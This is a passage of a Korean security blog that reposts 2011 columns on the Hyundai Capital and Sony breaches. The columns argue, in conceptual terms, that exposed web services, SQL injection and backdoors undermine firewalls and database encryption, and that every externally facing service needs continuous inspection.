이미 오래전 예상 되었던 것들이 현실화 된것에 지나지 않으며 국내는 물론이고 전 세계적으로 대응이 되지 않아 앞으로도 오랜기간 유사한 기사와 사례를 다수 접하게 될 것이다. 그때마다 인터넷은 위기의 상황에서 어둠 속의 파도타기를 계속 하게 될 것이다.  바다란

Posted by 바다란

위기의 인터넷은 본궤도에.. 4월의 교훈

-bloter.net 기고컬럼입니다.

국내외적으로 유사한 해킹 사례가 거의 동시에 발생을 하고 국내는 물론 세계적으로 이슈가 된 사례는 흔치 않다. 국내의 금융사와 국제적 IT기업이라고 할 수 있는 소니에 대한 해킹과 피해 사례는 앞으로의 대응에 있어서 많은 시사점을 던져준다.

정확하게는 앞으로의 대응 보다는 지금 당장의 대응이 더 시급한 측면을 가지고 있다. 일전 언론사 기고 컬럼에서 홈페이지 해킹과 악성코드 유포 및 대응방식에 대한 경고를한 적이 있다.

1. 신규 공격코드를 이용해 SQL Injection 자동화 공격도구로 취약한  서비스들에 대해 직접적인 공격이 발생 된다.

2.  서비스를 통해 악성코드가 유포된다.

A. 유관기관에서는 악성코드 신고 접수 시에 악성코드 유포하는 도메인에 대한 차단을진행한다.

B. 백신업체에서는 악성코드의 패턴을 이용해 대응하는 백신을 제작하거나 업데이트 한다.

C. 신규 취약성을 이용할 경우에는 패치를 설치 하라고 언급이 되고 패치가 나오지 않을경우에는 그냥 기다린다.

D. 악성코드가 웹을 통해 감염이 되고 주변 네트워크로도 확산이 되는 것과 같은 특이한상황의 경우 별도의 방안들을 강구하도록 한다.  ( ARP Spoofing)

3. 악성코드의 변형이 유포  경우 – 2 항에 있는 A,B,C 항목은 계속 반복이 된다.


2011년 현재도 악성코드의 유포와 대응에서 사용되고 있는 일반적인 시나리오라고 할 수 있다. 이 시나리오 상에서 이미 사전단계로 생략하고 넘어가는 부분은 이미 공격이 성공하여 악성코드를 유포할 때에는 내부망에 있는 Database에 관한 정보는 다 유출된 것과 마찬가지이고 내부로 침입 할 수 있는 통로는 이미 열려져 있는 것과 마찬가지라는 점이다.     ( http://p4ssion.com/261 마이너리티 리포트 참고)


무엇이 문제?

일반적으로 웹서버에 대한 공격에 성공을 하게 되면 언제든 간편하게 들어 올 수 있도록 통로를 만들어 둔다. 이를 백도어라고 부른다.  백도어를 통한 피해사례는 아직 끝나지 않은 현대캐피탈의 사례에서 확인이 가능하다.

소니의 사례라고 다를까? (소니의 사례는 외신에서 언급한 기사를 참고)

현대캐피탈은 보안인증을 받았고 미국에서 사업을 하고 있는 소니의 경우는 PCI-DSS라는 기본적인 보안 절차를 모두 준수할 정도로 두 회사 모두 보안에 신경을 쓰고 역점을 두었음에도 불구하고 결론적으로 최악의 해킹 피해를 당했다고 볼 수 있다. 금융회사의 내부 고객 정보가 유출이 되고 신용카드 내역을 저장한 데이터와 모든 고객정보가 유출되는 사례들은 발생 할 수 있는 최악의 사례라고 보아야 한다. 소니의 경우 정보유출로 인해 피해를 입는 고객에게는 일인당 최대 100만불 (11억원)의 피해보상을 한다는 보도도 있었으며 앞으로의 향방이 더욱 큰 관심을 끌고 있다.

거대기업을 침몰시킬 수도 있는 단초가 인터넷에 노출된 별로 중요하지 않은 웹서버 하나를 통해서도 제공 될 수 있다는 증거로서 목격 하게 될 것이다.

4월에 대표적인 해킹 피해를 입은 두 회사 모두 피해의 지점은 동일하다. 외부에 노출된 웹서버들을 통해 내부망으로 침입이 된 사례이며 웹서비스에 대한 상시적인 보안관리와 문제점 해결을 위한 노력이 모든 외부 노출 서비스 부분에 대해 이루어 지지 않을 경우 막대한 피해와 자칫하면 몰락으로도 이어질 수 있는 사례라 할 수 있다.


문제부분

일반적으로 IT 서비스를 운용하는 회사에서는 여러 종류의 서비스를 활용하고 있다.  예전과 같은 Client/ Server 모델이 아닌 웹을 활용한 정보교환과 업무 활용이 일반적인 상황에서 외부에 노출된 웹 서비스들은 항상 위험을 내포하고 있다.

대표적으로 URL 상에서 SQL ( 데이터베이스 질의 언어) 구문을 입력하여 데이터베이스의 자료를 빼내거나 조작하는 유형의 취약성인 SQL Injection의 경우가 가장 큰 예로 들 수 있는데 직접적으로 내부망에 침입하고 자료를 빼내어 갈 수 있다는 점에서 가장 치명적인 문제라고 할 수 있다. 해결 방안으로는 특수문자의 입력을 막거나 길이제한을 모든 URL 상의 인자들에 대해서 적용을 해야 하는데 사람이 개발하는 이상 항상 빈틈은 있게 마련이다. 또한 웹서비스 운영 Application 자체의 취약성을 이용한 공격들도 일반적인데 이 문제의 경우 정기적인 진단으로도 충분히 문제 해결을 할 수 있으나 잦은 변경이 있는 웹페이지의 경우에는 정기 진단으로 하기에는 변화의 폭이 커서 어려움이 있다.

보안을 강화하고 중요시 하는 기업들의 경우에는 정기적인 진단과 점검을 일상적으로 수행한다. 여기에서 발생하는 문제는 예산과 인력, 시간상의 문제로 인해 우선순위를 정해서 점검을 하게 마련이다. 항상 1순위는 대표 사이트 및 고객이 직접 접근 하는 사이트 및 정보가 저장되는 사이트가 된다. 그 뒤의 순위는 업무용 시스템이나 중요도에서 ( 고객 접근 관점의 중요도) 떨어지는 시스템들이 된다. 여기에서 근본적인 문제가 발생 된다. 지금까지는 사용자들이 많은 즉 정문에 대해서만 이중, 삼중의 진단과 도구들이 설치가 되었다고 봐야 한다. 그러나 공격자들도 정문만을 이용할까?

지금의 공격자들이 보유한 공격도구의 상태는 전문화 되어있고 대규모적인 공격이 가능하도록 되어 있다.  즉 모든 범위에 대해서 단 한가지의 문제점을 찾는 것이 일반적으로 되어 있다는 것이다.  외부에 노출된 모든 부분에 대해 문제점이 있는지를 수시로 점검하고 문제가 발견되면 직접 침입을 시도하게 된다.  지금까지 보안점검을 받던 기업에서는 중요성 있는 서비스와 우선순위에 대한 기준점을 모두 바꾸어야만 가능한 상황에 처해 있다.


해결방안?

외부에 노출된 모든 서비스를 1순위로 놓아야 하고 그 이후 내부에 있는 서비스들에 대해서 선별적으로 순위를 조정 하는 것이 바람직하다. 그리고 한 가지 더 중요한 것은 일년에 몇 차례 하기도 힘든 전체 서비스에 대한 보안 점검을 상시적으로 해야만 현재 기업들과 인터넷이 처한 문제점을 해결 할 수 있는데 사실상 한계가 존재 할 수 밖에 없다.  단 몇 시간 만에도 코드상에 변경이 일어날 수 있는 웹 서비스에 대해 정기진단으로 가능 할 수 있을까 하는 의문을 가져야 한다.

이제 보안 진단과 서비스에 대한 시각과 패러다임을 바꾸어야만 생존이 가능하며 기업의 서비스를 안전하게 유지 할 수 있는 상황에 직면해 있다. 그 누구도 안전하지 않은 상황.. 특히 IT기업 및 인터넷을 활용한 비즈니스가 일반적인 기업이라면 대단한 경각심과 준비를 하지 않으면 안될 것이다. 보안기업들 조차도 웹 서비스가 해킹을 당해 정보가 유출 되는 마당에 안전할 곳은 대체 어디인가?

몇 년 전 경고한 위기의 인터넷은 이제 본 궤도에 올랐다. 4월은 시작이였을 뿐이다.

- 바다란 세상 가장 낮은 곳의 또 다른 이름.

Posted by 바다란


지디넷 컬럼 기고본입니다. 2011.5

 

 

일반적으로 마이너리티 리포트라고 하면 톰크루즈 주연의 영화를 떠올리게 마련이다. 
범죄가 일어나기 전 범죄를 예측해 범죄자를 단죄하는 최첨단 치안 시스템이 언급된 영화로 알고 있다.

전체적으로는 진실로 통용되는 치안시스템의 예지와 무시되는 소수의 진실을 예견하는 의견의 충돌로 훼손되는 한 개인의 가치를 조명하고 회복하는 과정을 나타내고 있는 영화라 할 수 있다
.

지금의 상황에서의 마이너리티 리포트에 대한 이야기를 꺼내는 것은 무한한 신뢰가 부여한 시스템이 깨어질때의 충격들이 있는 지금의 시점이 적합한 시점이라 보기 때문이다
.


가려진 눈속에서 볼려고 하는 진실은 어디에 있고 무엇을 말하고자 하는 것인지 또 지금과 같은 위기의 인터넷 상황에서 소수의 의견은 무엇인지 알아 보도록 하자.

 본 컬럼에서는 물론 영화 이야기를 하고자 하는 것이 아니다. 현재의 IT 서비스의 위험 상황에 대해 좀 더 치열하고 전문적이며 문제의 근본이 무엇인가에 대해 정확한 이야기들이 없어 소수의견이 때론 진실에 가까울수 있다는 점을 빌리고 싶을 뿐이다. 보안전문가는 무엇이고 해커는 또 무엇인가?

 보안전문가라는 업종은 보안전문가와 보안관리자의 차이라는 컬럼(http://p4ssion.com/231) 에서 상세하게 구분을 한 적이 있다. 전문가의 관점에서 바라보는 지금의 여러 보안 이슈들은 분명히 가쉽거리와는 다른 관점에서 바라볼 것을 이야기 한다.
 
해킹사고가 빈발하고 이제는 왠만큼 큰 이슈가 아니면 화제거리에도 오르지 못하는 상황에서 언론에 기사화 된 많은 내용들은 실제 인과관계와 상당히 다른 관점의 이야기들을 많이 하고 있다. 정확한 의견과 그 의견에 기반한 문제점을 해결하는 과정을 통해 만들어야 될 많은 가치들이 있음에도 그릇된 길과 방향으로 목표를 설정하게 되면 한참 틀어지게 마련이다.

 
지금의 시점이 틀어지기 직전의 시점이라고 보인다.



사설
IP ( Private area)는 안전한가?

 

일반적으로 내부에서 구축하는 인터넷 환경을 인트라넷이라 부른다. 외부에서는 접근할 수 없는 영역이고 안전하다고 알려져 있다. 접근이 되지 않는데 어떤 침입을 받을 수 있겠는가? 대부분의 전문가가 아니거나 실무자가 아닌 많은 사람들은 외부자가 접근 할 수 없는 영역의 데이터가 유출 되었다고 할때 의심을 가진다. 내부자가 공모하여 내부로 들어 올 수 있도록 만들지는 않았을까? 아니면 정보가 공개적으로 바깥에 나와 있지는 않았을까? 하는 등등..

 

실상은 내부에 있는 모든 정보들도 외부와 연결을 하거나 연동을 하는 지점이 반드시 존재하고 연동이 되어야만 가치를 지니는 정보들이 대부분이라 연결이 될 수 밖에 없는 것이 사실이다.
이 연결 되는 지점의 대부분은 일반적으로 웹 서비스에서 맡고 있으며 대부분의 중요 데이터들은 내부에 있는 데이터베이스 서버에 보관 되곤 한다. 웹 서비스는 그럼 무었일까? 외부에도 공개되어 있으며 내부의 인트라넷 영역에도 접근이 가능한 지점에 위치하는 웹 서비스 및 대외 서비스들이 위치한 영역을 DMZ 영역이라 부른다. 이 영역에 있는 대부분의 서비스들은 IP 주소를 두가지를 가지게 된다. 외부에서 연결이 가능한 외부 IP 주소와 내부로 연결을 하기 위한 IP 주소를 가지게 된다. 외부 IP라는 것은 인터넷으로 연결이 가능하고 단일하고 유일한 주소를 인터넷 상에서 가지게 됨을 의미한다. 내부 IP는 인위적으로 내부 통신 연결을 위해 사용한 것으로 회사로 따지면 회사내의 주소 체계에서만 유일성이 보장되면 된다.

 

내부에서만 은밀하게 (?) 공유가 되고 접근 할 수 있다고 하는 정보들은 사실상 외부와 연결된 통로를 항상 지니게 되고 더 이상 은밀하다고 볼 수가 없다. 현대캐피탈과 소니 해킹의 사례가 증명을 한다. 설마 고객정보와 신용카드 정보등을 외부 인터넷에 올려두고 공유하였겠는가? ..

외부에서 직접 접근이 가능한 내부 IP는 없으며 인터넷상의 직접적인 공격으로 부터 보호된다 할 수 있다. 공격자들은 내부 정보를 빼내어 가기 위해 내부의 정보와 연결된 지점을 공격하여 내부로 들어가는 통로를 확보한다.

 정확하게는 웹서비스를 직접 공격하여 (외부 IP 및 내부 사설 IP를 동시에 가지는 웹서비스) 권한을 획득하고 웹서비스의 상태를 이용하여 내부망으로 직접 공격이 가능해 진다. 내부에 존재하는 데이터베이스의 정보를 빼내어 가는 것은 웹 서비스상에 내부 영역의 데이터베이스와 통신을 하고 데이터를 빼내어 웹서비스를 통해 사용자에게 제공하는 부분이 있기 때문에 가능한 것이다.

 

결론적으로 웹서비스를 공격하게 되면 웹 서비스와 연결된 데이테베이스는 그것이 어디에 있든 직접적인 피해를 입게 되고 거점으로 삼게 되면 더 은밀한 정보들이 저장된 곳에도 접근 할 수 있는 거점이 된다는 것이다. 웹서비스에 대한 해킹과 악성코드 유포지로 사용되는 웹 서비스들은 이미 데이터베이스에 대한 제어권을 상실 했다는 의미와도 동일한 것이다.

 

방화벽은 데이터를 보호하는가?

 

항상 내부의 데이터를 보호 한다는 것을 강조하기 위해 몇중의 방화벽으로 데이터가 보호 되고 있다는 언급을 많이 쓴다. 여기에서 몇단계의 수치가 높을 수록 보호되는 강도가 높다고 인식하는 경향이 있는데 전부 오해다.

방화벽의 역할상으로 보면 접근제어 이외에는 전혀 역할을 할 수가 없다
. 접근제어라는 것은 접근이 가능한 서비스나 특정 IP 에서만 접근이 가능하도록 통제하는 역할을 수행하는데 앞서 언급 했던 웹서비스의 역할은 데이터베이스와 연결하여 정보를 서비스를 통해 대외에 표시하는 역할이다. 방화벽에서도 웹서비스와 데이터베이스의 연결은 차단 할 수가 없다. 데이터베이스와 웹서비스를 연결하는 지점을 방화벽에서 막을 경우 정상 서비스는 될 수가 없는 것이다. 정상서비스를 한다는 의미는 웹서비스에 대한 공격과 권한 획득을 통해 데이터베이스에 대한 접근까지도 손쉽게 이루어 진다는 것이다.

 

데이터베이스의 암호화에 대해서 언급을 한다.

 

저장 되는 값들을 암호화 한다는 것은 공격자를 한번쯤 더 귀찮게 하는 것일뿐 그것은 절대 장애물이 될 수 없다. 앞서 언급 했듯이 웹서비스의 권한을 획득한다는 것은 모든 권한을 다 가지고 있는 것과 마찬가지이다. 데이터베이스에 암호화된 값들이 들어 있다 하여도 이 모든 값들을 비교하고 정상값 유무를 확인 하는 것은 모두 웹서비스의 코드에서 담당을 하고 있다. 공격자는 이미 웹서비스의 모든 권한을 가지고 있다